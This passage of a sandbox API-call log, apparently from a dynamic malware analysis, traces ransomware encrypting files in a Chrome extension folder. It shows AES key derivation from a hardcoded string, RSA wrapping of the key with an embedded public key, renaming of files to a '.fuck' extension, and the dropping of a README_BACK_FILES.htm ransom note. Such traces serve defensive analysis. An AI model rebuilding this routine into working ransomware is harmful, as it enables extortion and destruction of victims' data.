pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.186] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xc, lpOverlapped=0x0) returned 1 [0263.186] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x10) returned 1 [0263.186] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x10, lpOverlapped=0x0) returned 1 [0263.187] CloseHandle (hObject=0x5d5c) returned 1 [0263.187] CloseHandle (hObject=0x5d60) returned 1 [0263.187] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), bFailIfExists=0) returned 1 [0263.190] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json", dwFileAttributes=0x0) returned 1 [0263.190] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg")) returned 1 [0263.191] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.fuck")) returned 1 [0263.193] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0263.193] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.193] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.193] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.193] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0263.193] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\readme_back_files.htm")) returned 0xffffffff [0263.193] AreFileApisANSI () returned 1 [0263.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.193] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.194] GetFileType (hFile=0x5d64) returned 0x1 [0263.194] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.195] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.195] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.195] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.195] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.195] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.195] GetLastError () returned 0x0 [0263.195] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json")) returned 0x20 [0263.196] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json", dwFileAttributes=0x80) returned 1 [0263.196] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.197] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.198] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.198] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.200] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.200] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.200] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.200] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.200] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.200] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.200] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73c58) returned 1 [0263.201] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73c58, dwCertEncodingType=0x1, pInfo=0x2ead420*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2ead450*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2ead458*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e840) returned 1 [0263.201] CryptEncrypt (in: hKey=0x2e7e840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.201] CryptEncrypt (in: hKey=0x2e7e840, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73d68*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73d68*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.201] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e73d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73d68*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.202] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.203] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.203] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.214] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.215] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.215] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.215] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.215] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.215] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.216] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.216] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.216] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.216] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.216] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.216] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.217] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.217] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 